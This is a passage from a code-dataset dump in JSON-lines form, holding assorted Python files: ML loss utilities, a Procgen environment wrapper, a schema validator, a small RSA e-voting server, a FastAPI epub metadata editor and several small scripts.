Click here to activate one.\"),\n title=_(\"Theming\"),\n url=\"shoop_admin:xtheme.config\"\n )\n","repo_name":"if413019/ShoopDevelopment","sub_path":"shoop/xtheme/admin_module/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10745025747","text":"\nfrom pylib import namedtuple\n\nWEIGHT_LIGHT = 1\nWEIGHT_HEAVY = 2\nWEIGHT_FIXED = 3\n\nclass Model(object):\n def __init__(self, style, shape, pos, mark):\n self.style = style\n self.shape = shape\n self.pos = pos\n self.mark = mark\n\n def is_unit(self):\n return self.style.is_unit\n\n def get_weight(self):\n return self.style.weight\n\n def is_fixed(self):\n return self.get_weight() == WEIGHT_FIXED\n\n def is_immovable(self):\n return self.is_fixed() or self.is_unit()\n\n def should_go_out(self):\n return self.is_unit()\n\n def is_out(self):\n \"\"\"Returns whether the model left the room.\n \"\"\"\n x, y = self.pos\n return x < 0\n\n def __repr__(self):\n return \"%s:%s\" % (self.mark, self.pos)\n\ndef parse_models(maze):\n models = []\n for style, marks in STYLE_MARKS.iteritems():\n for mark in marks:\n positions = maze.find_positions(mark)\n if len(positions) == 0:\n continue\n pos, shape = _normalize_shape(positions)\n models.append(Model(style, shape, pos, mark))\n\n return models\n\ndef _normalize_shape(positions):\n \"\"\"Returns the first position\n and a list of offests from it.\n \"\"\"\n pos = positions[0]\n x, y = pos\n shape = []\n for x2, y2 in positions:\n dx = x2 - x\n dy = y2 - y\n shape.append((dx,dy))\n\n return pos, shape\n\ndef find_model(models, mark):\n \"\"\"Finds the model with the given mark.\n \"\"\"\n for model in models:\n if model.mark == mark:\n return model\n\n return None\n\ndef _chars(start, end):\n \"\"\"Returns a string with chars the from [start-end] set.\n \"\"\"\n return \"\".join(chr(i) for i in range(ord(start), ord(end) + 1))\n\nStyle = namedtuple.namedtuple(\"Style\", \"weight is_unit\")\nSTYLE_FIXED = Style(WEIGHT_FIXED, False)\nSTYLE_SMALL_FISH = Style(WEIGHT_LIGHT, True)\nSTYLE_BIG_FISH = Style(WEIGHT_HEAVY, True)\nSTYLE_LIGHT = Style(WEIGHT_LIGHT, False)\nSTYLE_HEAVY = Style(WEIGHT_HEAVY, False)\n\nSTYLE_MARKS = {\n STYLE_FIXED: \"#\",\n STYLE_SMALL_FISH: \"+0123456789\",\n STYLE_BIG_FISH: \"*\",\n STYLE_LIGHT: _chars(\"a\", \"z\"),\n STYLE_HEAVY: _chars(\"A\", \"Z\"),\n }\n\n","repo_name":"fidlej/sokobot","sub_path":"soko/env/fillets/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72379261547","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport sonnet as snt\nimport tensorflow.compat.v1 as tf\n\n\nclass MovingAverage(snt.AbstractModule):\n \"\"\"A thin wrapper around snt.MovingAverage.\n\n The module adds the option not to differentiate through the last element that\n is added to the moving average, specified by means of the kwarg\n `differentiable`.\n \"\"\"\n\n def __init__(self, decay, local=True, differentiable=False,\n name='snt_moving_average'):\n super(MovingAverage, self).__init__(name=name)\n self._differentiable = differentiable\n self._moving_average = snt.MovingAverage(\n decay=decay, local=local, name=name)\n\n def _build(self, inputs):\n if not self._differentiable:\n inputs = tf.stop_gradient(inputs)\n 
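# Note: the moving-average statistics are still updated with the detached\n    # value; stop_gradient above only blocks backpropagation through this\n    # last element, i.e. the differentiable=False behaviour from the docstring.\n    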
return self._moving_average(inputs)\n\n\nclass LagrangeMultiplier(snt.AbstractModule):\n \"\"\"A lagrange multiplier sonnet module.\"\"\"\n\n def __init__(self,\n rate=1e-2,\n name='snt_lagrange_multiplier'):\n \"\"\"Initializer for the sonnet module.\n\n Args:\n rate: Scalar used to scale the magnitude of gradients of the Lagrange\n multipliers, defaulting to 1e-2.\n name: Name of the Lagrange multiplier sonnet module.\n \"\"\"\n super(LagrangeMultiplier, self).__init__(name=name)\n self._rate = rate\n\n def _build(self, ma_constraint):\n \"\"\"Connects the module to the graph.\n\n Args:\n ma_constraint: A loss minus a target value, denoting a constraint that\n shall be less or equal than zero.\n\n Returns:\n An op, which when added to a loss and calling minimize on the loss\n results in the optimizer minimizing w.r.t. to the model's parameters and\n maximizing w.r.t. the Lagrande multipliers, hence enforcing the\n constraints.\n \"\"\"\n lagmul = snt.get_lagrange_multiplier(\n shape=ma_constraint.shape, rate=self._rate,\n initializer=np.ones(ma_constraint.shape))\n return lagmul\n\n\ndef _sample_gumbel(shape, eps=1e-20):\n \"\"\"Transforms a uniform random variable to be standard Gumbel distributed.\"\"\"\n\n return -tf.log(\n -tf.log(tf.random_uniform(shape, minval=0, maxval=1) + eps) + eps)\n\n\ndef _topk_mask(score, k):\n \"\"\"Returns a mask for the top-k elements in score.\"\"\"\n\n _, indices = tf.nn.top_k(score, k=k)\n return tf.scatter_nd(tf.expand_dims(indices, -1), tf.ones(k),\n tf.squeeze(score).shape.as_list())\n\n\ndef ce_loss(logits, labels, mask=None, top_k_percentage=None,\n deterministic=False):\n \"\"\"Computes the cross-entropy loss.\n\n Optionally a mask and a top-k percentage for the used pixels can be specified.\n\n The top-k mask can be produced deterministically or sampled.\n Args:\n logits: A tensor of shape (b,h,w,num_classes)\n labels: A tensor of shape (b,h,w,num_classes)\n mask: None or a tensor of shape (b,h,w).\n top_k_percentage: None or a float in (0.,1.]. If None, a standard\n cross-entropy loss is calculated.\n deterministic: A Boolean indicating whether or not to produce the\n prospective top-k mask deterministically.\n\n Returns:\n A dictionary holding the mean and the pixelwise sum of the loss for the\n batch as well as the employed loss mask.\n \"\"\"\n num_classes = logits.shape.as_list()[-1]\n y_flat = tf.reshape(logits, (-1, num_classes), name='reshape_y')\n t_flat = tf.reshape(labels, (-1, num_classes), name='reshape_t')\n if mask is None:\n mask = tf.ones(shape=(t_flat.shape.as_list()[0],))\n else:\n assert mask.shape.as_list()[:3] == labels.shape.as_list()[:3],\\\n 'The loss mask shape differs from the target shape: {} vs. {}.'.format(\n mask.shape.as_list(), labels.shape.as_list()[:3])\n mask = tf.reshape(mask, (-1,), name='reshape_mask')\n\n n_pixels_in_batch = y_flat.shape.as_list()[0]\n xe = tf.nn.softmax_cross_entropy_with_logits_v2(labels=t_flat, logits=y_flat)\n\n if top_k_percentage is not None:\n assert 0.0 < top_k_percentage <= 1.0\n k_pixels = tf.cast(tf.floor(n_pixels_in_batch * top_k_percentage), tf.int32)\n\n stopgrad_xe = tf.stop_gradient(xe)\n norm_xe = stopgrad_xe / tf.reduce_sum(stopgrad_xe)\n\n if deterministic:\n score = tf.log(norm_xe)\n else:\n # Use the Gumbel trick to sample the top-k pixels, equivalent to sampling\n # from a categorical distribution over pixels whose probabilities are\n # given by the normalized cross-entropy loss values. 
This is done by\n # adding Gumbel noise to the logarithmic normalized cross-entropy loss\n # (followed by choosing the top-k pixels).\n score = tf.log(norm_xe) + _sample_gumbel(norm_xe.shape.as_list())\n\n score = score + tf.log(mask)\n top_k_mask = _topk_mask(score, k_pixels)\n mask = mask * top_k_mask\n\n # Calculate batch-averages for the sum and mean of the loss\n batch_size = labels.shape.as_list()[0]\n xe = tf.reshape(xe, shape=(batch_size, -1))\n mask = tf.reshape(mask, shape=(batch_size, -1))\n ce_sum_per_instance = tf.reduce_sum(mask * xe, axis=1)\n ce_sum = tf.reduce_mean(ce_sum_per_instance, axis=0)\n ce_mean = tf.reduce_sum(mask * xe) / tf.reduce_sum(mask)\n\n return {'mean': ce_mean, 'sum': ce_sum, 'mask': mask}\n","repo_name":"deepmind/deepmind-research","sub_path":"hierarchical_probabilistic_unet/geco_utils.py","file_name":"geco_utils.py","file_ext":"py","file_size_in_byte":5209,"program_lang":"python","lang":"en","doc_type":"code","stars":11900,"dataset":"github-code","pt":"37"} +{"seq_id":"362690829","text":"'''\nused to copy sampled frames to a new folder. \nuseful for transfering data across computers.\n'''\n\nimport os\nimport sys\nimport shutil\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(BASE_DIR)\n\nfrom config import TARGET\nSCANS = sorted(os.listdir(TARGET))\nTRAIN_FRAMES = os.path.join(BASE_DIR, \"sampled_train_25.txt\")\nVAL_FRAMES = os.path.join(BASE_DIR, \"sampled_val_25.txt\")\n\n# ---------------------------------------------------\n# the path to save, please update!\nSAVE = None\n# ---------------------------------------------------\n\ndef copy_images(log):\n with open(log, \"r\") as f:\n files = f.read().splitlines()\n for i, l in enumerate(files):\n # depth\n src = os.path.join(TARGET, l+\".png\")\n # rgb\n src2 = os.path.join(TARGET, l+\".color.jpg\")\n # pose\n pose = os.path.join(TARGET, l+\".pose.txt\")\n # destination\n dst = os.path.join(SAVE, l.split(\"/\")[0])\n shutil.copy2(src, dst)\n shutil.copy2(src2, dst)\n shutil.copy2(pose, dst)\n if i%1000 == 0:\n print(\"... 
{:d} frames copied\".format(i))\n\n\ndef main():\n # create sub folders\n for s in SCANS:\n f = os.path.join(SAVE, s)\n if not os.path.exists(f):\n os.mkdir(f)\n\n # copy calibrations\n for s in SCANS:\n f = os.path.join(SAVE, s)\n c = os.path.join(TARGET, s, \"_info.txt\")\n shutil.copy2(c, f)\n\n # copy depth maps and rgb images\n copy_images(TRAIN_FRAMES)\n copy_images(VAL_FRAMES)\n print(\"ok\")\n\n\nif __name__ == \"__main__\":\n main()\n ","repo_name":"lilanxiao/Invar3D","sub_path":"scannet/save_sampled.py","file_name":"save_sampled.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"29959138918","text":"import argparse\nimport json\nimport jsonschema\nimport sys\n\n\ndef validate_json(schema_json, replay_json):\n \"\"\"\n Validate the replay file against the provided schema.\n \"\"\"\n try:\n jsonschema.validate(instance=replay_json, schema=schema_json)\n except jsonschema.ValidationError:\n print(\"The replay file does not validate against the schema.\")\n return False\n else:\n return True\n\n\ndef verify_there_was_a_transaction(replay_json):\n \"\"\"\n Verify that the replay file has a sensible looking transaction.\n \"\"\"\n try:\n transactions = replay_json['sessions'][0]['transactions']\n except KeyError:\n print(\"The replay file did not have transactions in it.\")\n return False\n\n if len(transactions) < 1:\n print(\"There are no transactions in the replay file.\")\n return False\n transaction = transactions[0]\n if not ('client-request' in transaction and 'server-response' in transaction):\n print(\"There was not request and response in the transaction of the replay file.\")\n return False\n\n return True\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"schema_file\",\n type=argparse.FileType('r'),\n help=\"The schema in which to interpret validate the replay file.\")\n parser.add_argument(\"replay_file\",\n type=argparse.FileType('r'),\n help=\"The replay file to validate.\")\n return parser.parse_args()\n\n\ndef main():\n args = parse_args()\n\n schema_json = json.load(args.schema_file)\n replay_json = json.load(args.replay_file)\n\n if not validate_json(schema_json, replay_json):\n return 1\n\n # Verifying that there is a transaction in the replay file may seem\n # unnecessary since the replay file validated against the schema. But a JSON\n # file that doesn't have conflicting entry names will pass the schema. 
For\n # instance, this passes against our replay schema:\n #\n # {\"name\": \"Bob\", \"languages\": [\"English\", \"French\"]}\n #\n # Thus we do the following sanity check to make sure that the replay file\n # appears to have some transaction in it.\n if not verify_there_was_a_transaction(replay_json):\n return 1\n\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"ezelkow1/ATS-TEST","sub_path":"tests/gold_tests/pluginTest/traffic_dump/verify_replay.py","file_name":"verify_replay.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31667420731","text":"import os, sys, argparse\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--word', '-w')\nparser.add_argument('--folder', '-f')\nparser.add_argument('--mode', '-m')\nargs = parser.parse_args(sys.argv[1:])\n\ndef main(word, folder, mode):\n if mode == 'titles':\n print(titles(word, folder))\n else:\n print(content(word, folder))\n\ndef titles(word, folder):\n list_titles = []\n count = 0\n for root, dirs, files in os.walk(folder):\n [list_titles.append(i) for i in dirs]\n [list_titles.append(i) for i in files]\n for i in list_titles:\n if word.lower() in i.lower():\n count += 1\n return count\n\ndef content(word, folder):\n list_files = []\n count = 0\n for root, dirs, files in os.walk(folder):\n for name in files:\n list_files.append(root + '/' + name)\n for f in list_files:\n with open(f, 'r') as file:\n try:\n for line in file.readlines():\n count += line.lower().count(word.lower())\n except:\n pass\n return count\n\n\nmain(args.word, args.folder, args.mode)\n\n# Search in titles:\n# python3 script.py -w [word] -f [folder] -m titles\n# Search in files:\n# python3 script.py -w [word] -f [folder]\n","repo_name":"bukhtinicheva/python_project","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32591368315","text":"import pymysql.cursors\nimport random\nimport string\nimport sys\nimport socket\nimport time\nimport multiprocessing\nimport hashlib\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Util.number import *\n\ntime.clock = time.process_time\n\nprojects = [[]]*6\nprojects[1] = [1,2,3,4,5,6]\nprojects[3] = [1,2,5,6]\nprojects[4] = [1,2,4,5,6]\nprojects[5] = [1,2,3,5,6]\n\nskey = RSA.generate(1024)\n\ndef server(conn):\n try:\n flag = conn.recv(1).decode() \n connection = pymysql.connect(host='localhost',\n port=8888,\n user='root',\n password='supersecret',\n database='crypto_final',\n cursorclass=pymysql.cursors.DictCursor)\n\n if flag == '1':\n username = conn.recv(1024).decode()\n password = conn.recv(1024).decode()\n \n with connection:\n with connection.cursor() as cursor:\n sql = \"SELECT `password` FROM `users` WHERE `username`=%s\"\n cursor.execute(sql, (username,))\n result = cursor.fetchone()\n if result['password'] != hashlib.sha256(password.encode()).hexdigest():\n exit()\n \n time.sleep(0.01)\n conn.send(str(skey.e).encode())\n time.sleep(0.01)\n conn.send(str(skey.n).encode())\n\n valid_projects = ''\n for i in range(len(projects)):\n if len(projects[i]) != 0:\n with connection.cursor() as cursor:\n sql = \"SELECT * FROM `signatures` WHERE `username`=%s and `projectID`=%s\"\n cursor.execute(sql, (username, i))\n result = cursor.fetchone()\n if not result:\n valid_projects += '.'+str(i)\n\n valid_projects = valid_projects[1:]\n 
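# send the '.'-separated list of projects this user has no ballot signature for yet;\n            # the 10 ms sleeps presumably keep consecutive send() calls from being read\n            # back as a single message by the client's recv()\n            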
time.sleep(0.01)\n conn.send(valid_projects.encode())\n valid_projects = valid_projects.split('.')\n valid_projects = [int(i) for i in valid_projects]\n\n ticket = conn.recv(1024).decode()\n project_id = int(ticket[:ticket.find('00000')])\n ticket = int(ticket)\n if project_id not in valid_projects:\n exit()\n\n sig_ticket = pow(ticket, skey.d, skey.n)\n time.sleep(0.01)\n conn.send(str(sig_ticket).encode())\n \n options = \"\"\n for i in projects[project_id]:\n options += '.'+str(i)\n options = options[1:]\n time.sleep(0.01)\n conn.send(options.encode())\n \n pkc = int(conn.recv(1024).decode())\n sig_pkc = pow(pkc, skey.d, skey.n)\n time.sleep(0.01)\n conn.send(str(sig_pkc).encode())\n \n with connection.cursor() as cursor:\n sql = \"INSERT INTO `signatures` (`username`, `projectID`, `sigPKC`) VALUES (%s, %s, %s)\"\n cursor.execute(sql, (username, project_id, str(sig_pkc)))\n connection.commit()\n\n elif flag == '2':\n option = int(conn.recv(1024).decode())\n pkc = int(conn.recv(1024).decode())\n sig_ticket = int(conn.recv(1024).decode())\n sig_pkc = int(conn.recv(1024).decode())\n sig_hoption = int(conn.recv(1024).decode())\n sig_pkc1 = pow(pkc, skey.d, skey.n)\n sig_pkc2 = sig_pkc\n\n ticket = str(pow(sig_ticket, skey.e, skey.n))\n project_id = int(ticket[:ticket.find('00000')])\n \n if option not in projects[project_id]:\n exit()\n\n if sig_pkc1 != sig_pkc2:\n exit()\n\n hoption1 = pow(sig_hoption, int(str(pkc)[-5:]), int(str(pkc)[:-5]))\n hoption2 = int(hashlib.sha256(str(option).encode()).hexdigest(), 16)\n if hoption1 != hoption2:\n exit()\n\n with connection:\n with connection.cursor() as cursor:\n sql = \"SELECT * FROM `votes` WHERE `PKC`=%s\"\n cursor.execute(sql, (str(pkc)))\n result = cursor.fetchone()\n if result:\n exit()\n\n with connection.cursor() as cursor:\n sql = \"INSERT INTO `votes` (`projectID`, `optionID`, `PKC`, `sigHoption`) VALUES (%s, %s, %s, %s)\"\n cursor.execute(sql, (project_id, option, str(pkc), str(sig_hoption)))\n connection.commit()\n conn.send('Success'.encode())\n\n elif flag == '3':\n project_list = ''\n for i in range(len(projects)):\n if len(projects[i]) != 0:\n project_list += '.'+str(i)\n project_list = project_list[1:]\n conn.send(project_list.encode())\n project_id = int(conn.recv(1024).decode())\n if not str(project_id) in project_list.split('.'):\n exit()\n\n with connection:\n with connection.cursor() as cursor:\n sql = \"SELECT * FROM `votes` WHERE `projectID`=%s\"\n cursor.execute(sql, project_id)\n result = cursor.fetchall()\n conn.send(str(result).encode())\n \n else:\n print('bye')\n\n except ConnectionResetError:\n conn.close()\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\ns.bind(('0.0.0.0', 7777))\ns.listen(10)\n\nwhile True:\n conn, addr = s.accept()\n m = multiprocessing.Process(target=server, args=(conn,))\n m.daemon = True\n m.start()\n\n","repo_name":"ycl-lcy/crypto_evoting","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":6022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24422771753","text":"from typing import Literal, Tuple, TypedDict\n\nimport gymnasium as gym\nimport numpy as np\nfrom gymnasium import spaces\nfrom procgen import ProcgenGym3Env\nfrom ray.tune.registry import register_env\n\n\nclass BaseProcgenEnvConfig(TypedDict):\n env_name: str\n distribution_mode: Literal[\"easy\", \"hard\", \"exploration\"]\n frameskip: int\n num_actions: int\n\n\nclass 
ProcgenEnvConfig(BaseProcgenEnvConfig):\n num_levels: int\n start_level: int\n\n\nclass ProcgenEnv(gym.Env):\n def __init__(self, config: ProcgenEnvConfig, horizon: float = np.inf, **kwargs):\n kwargs.update(\n {\n \"num\": 1,\n \"env_name\": config[\"env_name\"],\n \"distribution_mode\": config[\"distribution_mode\"],\n \"rand_seed\": 0,\n }\n )\n if config[\"distribution_mode\"] != \"exploration\":\n kwargs.update(\n {\n \"num_levels\": config[\"num_levels\"],\n \"start_level\": config[\"start_level\"],\n }\n )\n self.env = ProcgenGym3Env(**kwargs)\n self.frameskip = config[\"frameskip\"]\n self.horizon = horizon\n self.action_space = spaces.Discrete(config[\"num_actions\"])\n self.observation_space = spaces.Box(\n low=0,\n high=1,\n shape=self.env.ob_space[\"rgb\"].shape,\n )\n\n def reset(self, *args, **kwargs):\n reward, base_obs, first = self.env.observe()\n while not first[0]:\n self.env.act(np.array([0]))\n reward, base_obs, first = self.env.observe()\n self.done = False\n self.t = 0\n return self._get_obs(base_obs), {}\n\n def _get_obs(self, base_obs):\n return base_obs[\"rgb\"][0] / 255\n\n def step(self, action: int) -> Tuple[np.ndarray, float, bool, bool, dict]:\n if self.done:\n reward, base_obs, first = self.env.observe()\n return self._get_obs(base_obs), 0.0, self.done, False, {}\n\n total_reward = 0.0\n for _ in range(self.frameskip):\n self.env.act(np.array([action]))\n reward, base_obs, first = self.env.observe()\n total_reward += reward[0]\n\n if first[0]:\n self.done = True\n break\n\n self.t += 1\n if self.t >= self.horizon:\n self.done = True\n\n return self._get_obs(base_obs), total_reward, self.done, False, {}\n\n def render(self, mode=\"human\"):\n assert mode == \"rgb_array\"\n reward, base_obs, first = self.env.observe()\n return self._get_obs(base_obs)\n\n\nregister_env(\"procgen\", ProcgenEnv)\n\n\nclass DeterministicProcgenEnvConfig(BaseProcgenEnvConfig):\n level: int\n horizon: int\n\n\nclass DeterministicProcgenEnv(ProcgenEnv):\n def __init__(self, config: DeterministicProcgenEnvConfig, **kwargs):\n nondeterministic_config: ProcgenEnvConfig = {\n \"env_name\": config[\"env_name\"],\n \"distribution_mode\": config[\"distribution_mode\"],\n \"frameskip\": config[\"frameskip\"],\n \"num_actions\": config[\"num_actions\"],\n \"start_level\": config[\"level\"],\n \"num_levels\": 1,\n }\n super().__init__(nondeterministic_config, horizon=config[\"horizon\"], **kwargs)\n self.start_state = self.env.get_state()\n\n def reset(self, *args, **kwargs):\n self.env.set_state(self.start_state)\n reward, base_obs, first = self.env.observe()\n assert first[0] and reward[0] == 0\n self.done = False\n self.t = 0\n return self._get_obs(base_obs), {}\n","repo_name":"cassidylaidlaw/effective-horizon","sub_path":"effective_horizon/envs/procgen.py","file_name":"procgen.py","file_ext":"py","file_size_in_byte":3586,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"4198856791","text":"# https://leetcode.com/problems/average-of-levels-in-binary-tree\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def averageOfLevels(self, root: TreeNode) -> List[float]:\n result = []\n tobeTraversed = [root]\n \n while(tobeTraversed):\n sum = 0\n length = 0\n nextLevel = []\n \n while(tobeTraversed):\n node = tobeTraversed.pop(0)\n sum += node.val\n length += 1\n if(node.left):\n 
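# queue the children discovered on this pass; they make up the next\n                    # level of the BFS, so each outer iteration averages one tree depth\n                    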
nextLevel.append(node.left)\n                if(node.right):\n                    nextLevel.append(node.right)\n            tobeTraversed = nextLevel\n            result.append(sum/length) \n        \n        return result\n        \n","repo_name":"DucNgn/Grinding","sub_path":"637.py","file_name":"637.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10352640832","text":"\"\"\"A simple web application using epubmangler\"\"\"\n\nimport os\nimport re\nimport shutil\nimport time\nimport uuid\n\nimport uvicorn\n\nfrom multiprocessing import Process\nfrom pathlib import Path\nfrom xml.etree.ElementTree import Element\n\nfrom fastapi import FastAPI, File, UploadFile, Request\nfrom fastapi.responses import FileResponse, HTMLResponse\nfrom fastapi.staticfiles import StaticFiles\n\nfrom epubmangler import EPub, EPubError, json_to_dict, strip_namespace\n\nINFO, WARNING, ERROR = 0, 1, 2\nUPLOAD = Path('upload')\nSTATIC = Path('static')\nINDEX = Path(STATIC, 'main.html')\nTEMPLATE = Path(STATIC, 'template.html')\n\n\ndef log(message: str, level: int = INFO, pid: int = None) -> None:\n    \"\"\"Prints a message that looks kind of like the ones made by uvicorn.\"\"\"\n\n    if level == INFO:\n        message = f'\\u001b[32mINFO\\u001b[0m: {message}'\n    elif level == WARNING:\n        message = f'\\u001b[33mWARNING\\u001b[0m: {message}'\n    elif level == ERROR:\n        message = f'\\u001b[31mERROR\\u001b[0m: {message}'\n\n    if pid:\n        message += ' [\\u001b[36m' + str(pid) + '\\u001b[0m]'\n\n    print(message)\n\n\ndef tidy(sleep_length: int = 600) -> None:\n    \"\"\"Remove files older than \`sleep_length\` seconds from the upload directory\n    on a regular basis.\n    \n    \`sleep_length\` is also the number of seconds to sleep after each iteration.\"\"\"\n\n    while True:\n        now = time.time()\n\n        for file in os.listdir(UPLOAD):\n            if file != 'image' and now - os.stat(Path(UPLOAD, file)).st_mtime > sleep_length:\n                os.remove(Path(UPLOAD, file))\n\n        for file in os.listdir(Path(UPLOAD, 'image')):\n            if now - os.stat(Path(UPLOAD, 'image', file)).st_mtime > sleep_length:\n                os.remove(Path(UPLOAD, 'image', file))\n\n        try:\n            time.sleep(sleep_length)\n        except KeyboardInterrupt:\n            break\n\n\nclass TemplateResponse(HTMLResponse):\n    \"\"\"An HTMLResponse that inserts its body into the shared page template.\"\"\"\n    template: str = open(TEMPLATE, 'r').read()\n    def __init__(self, html: str) -> None:\n        HTMLResponse.__init__(self, self.template.replace('{{body}}', html))\n\n\napp = FastAPI()\napp.mount('/static', StaticFiles(directory=STATIC), name='static')\napp.mount('/upload', StaticFiles(directory=UPLOAD), name='upload')\n\n\n@app.get('/', response_class=HTMLResponse)\nasync def main() -> HTMLResponse:\n    return HTMLResponse(open(INDEX, 'r').read())\n\n\n@app.post('/edit', response_class=TemplateResponse)\nasync def edit(file: UploadFile = File(...)) -> TemplateResponse:\n    filename = UPLOAD / file.filename\n\n    with open(filename, 'wb') as temp:\n        temp.write(await file.read())\n\n    try:\n        epub = EPub(filename)\n    except EPubError:\n        os.remove(filename)\n        return TemplateResponse(f\"\"\"Not a valid epub file: {filename}\\n\\n\n    Create an issue at \n    https://github.com/davekeogh/epubmangler/issues \n    if your epub is not supported properly. Sorry!\"\"\")\n    else:\n        html = (\n            '<form action=\"/download\" method=\"post\" enctype=\"multipart/form-data\">\\n'\n            f'<h2>Editing: {filename.name}</h2>\\n'\n            '<p>Pro tip: Don\'t touch the Attrib column, unless you know what you are doing.</p>\\n'\n            f'<input type=\"hidden\" name=\"filename\" value=\"{filename}\" />\\n'\n        )\n\n        if epub.get_cover():\n            cover_path = Path(epub.get_cover())\n            temp_cover = Path()\n\n            if cover_path.is_file():\n                temp_cover = UPLOAD / 'image' / f'{uuid.uuid4()}{cover_path.suffix}'\n                shutil.copy(cover_path, temp_cover)\n\n            if temp_cover.is_file():\n                html += f'<input type=\"file\" name=\"cover-upload\" accept=\"image/*\" />\\n'\n\n            alt_text = f'Cover page of {epub[\"title\"].text} by {epub[\"creator\"].text}'\n            html += f'<img src=\"/{temp_cover}\" alt=\"{alt_text}\" />\\n'\n\n        html += '<table>\\n<tr><th>Tag</th><th>Text</th><th>Attrib</th></tr>\\n'\n\n        for item in epub.metadata:\n            if strip_namespace(item.tag) == 'description':\n                html += (\n                    f'<tr><td>{strip_namespace(item.tag)}:</td>'\n                    f'<td><textarea name=\"{strip_namespace(item.tag)}-text\">{item.text}</textarea></td>'\n                )\n            else:\n                html += (\n                    f'<tr><td>{strip_namespace(item.tag)}:</td>'\n                    f'<td><input type=\"text\" name=\"{strip_namespace(item.tag)}-text\" value=\"{item.text}\" /></td>'\n                )\n\n            if item.attrib:\n                html += f'<td><input type=\"text\" name=\"{strip_namespace(item.tag)}-attrib\" value=\"{item.attrib}\" /></td>'\n            else:\n                html += f'<td><input type=\"text\" name=\"{strip_namespace(item.tag)}-attrib\" /></td>'\n\n            html += f'</tr>\\n'\n\n        html += (\n            '</table>\\n'\n            '<input type=\"submit\" value=\"Save and download\" />'\n            '</form>
'\n )\n\n return TemplateResponse(html)\n\n\n@app.post('/download', response_class=FileResponse)\nasync def download(request: Request) -> FileResponse:\n form = await request.form()\n filename = Path(form['filename'])\n\n if filename.parent != UPLOAD:\n return TemplateResponse(f'bad request: {form}')\n\n epub = EPub(form['filename'])\n items = []\n new_items = []\n\n for field in form.keys():\n if field.endswith('-text') or field.endswith('-attrib') or field == 'filename':\n continue # TODO: Refactor to use match in 3.10+\n elif field == 'cover-upload':\n try:\n epub.set_cover(form['cover-upload'])\n except EPubError:\n epub.add_cover(form['cover-upload'])\n elif re.match('(new[0-9]*)-(.+)', field):\n new_items.append(Element(field))\n else:\n items.append(Element(field))\n\n for element in items:\n element.text = form[f'{element.tag}-text']\n element.attrib = json_to_dict(form[f'{element.tag}-attrib'])\n\n for element in new_items:\n prefix, element.tag = re.match('(new[0-9]*)-(.+)', element.tag).groups()\n element.text = form[f'{prefix}-text']\n element.attrib = json_to_dict(form[f'{prefix}-attrib'])\n\n epub.update(items)\n epub.save(filename, overwrite=True)\n\n # return TemplateResponse(f'Downloading: {Path(epub.file).name}...')\n return FileResponse(filename, filename=filename.name)\n\n\nif __name__ == '__main__':\n p = Process(target=tidy)\n p.start()\n log('Started tidy process', level=INFO, pid=p.pid)\n uvicorn.run(app, host='127.0.0.1', port=8000)\n log('Finished tidy process', level=INFO, pid=p.pid)\n","repo_name":"davekeogh/epubmangler","sub_path":"web/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6822,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"22118657692","text":"import openpyxl\n\ndef import_models(wb):\n models = []\n ws = wb['models']\n rows = ws.rows\n for row in rows:\n model = {}\n brand = row[0].value\n model_name = row[1].value\n additional_keywords_str = row[2].value\n priority = row[3].value \n max_price = row[4].value\n min_price = row[5].value\n fair_price = row[6].value\n text = row[7].value\n if additional_keywords_str:\n additional_keywords = additional_keywords_str.split(',')\n else:\n additional_keywords = additional_keywords_str\n if model_name:\n model = dict(brand=brand, model_name=model_name, additional_keywords=additional_keywords, priority=priority, max_price=max_price, fair_price=fair_price, min_price=min_price, text=text)\n models.append(model)\n return models\n\ndef import_divs(wb):\n divs = []\n ws = wb['divs']\n rows = ws.rows\n for row in rows:\n divs.append(row[0].value)\n return divs\n\ndef import_gus(wb):\n gus = []\n ws = wb['gus']\n rows = ws.rows\n for row in rows:\n gus.append(row[0].value)\n return gus\n\ndef import_colors(wb):\n colors = []\n ws = wb['colors']\n rows = ws.rows\n for row in rows:\n colors.append(row[0].value)\n return colors\n\ndef import_limited(wb):\n limited = []\n ws = wb['limited']\n rows = ws.rows\n for row in rows:\n limited.append(row[0].value)\n return limited\n\ndef import_groundsheet(wb):\n groundsheet = []\n ws = wb['groundsheet']\n rows = ws.rows\n for row in rows:\n groundsheet.append(row[0].value)\n return groundsheet\n\ndef import_inner_tent(wb):\n inner_tent = []\n ws = wb['inner_tent']\n rows = ws.rows\n for row in rows:\n inner_tent.append(row[0].value)\n return inner_tent\n\ndef 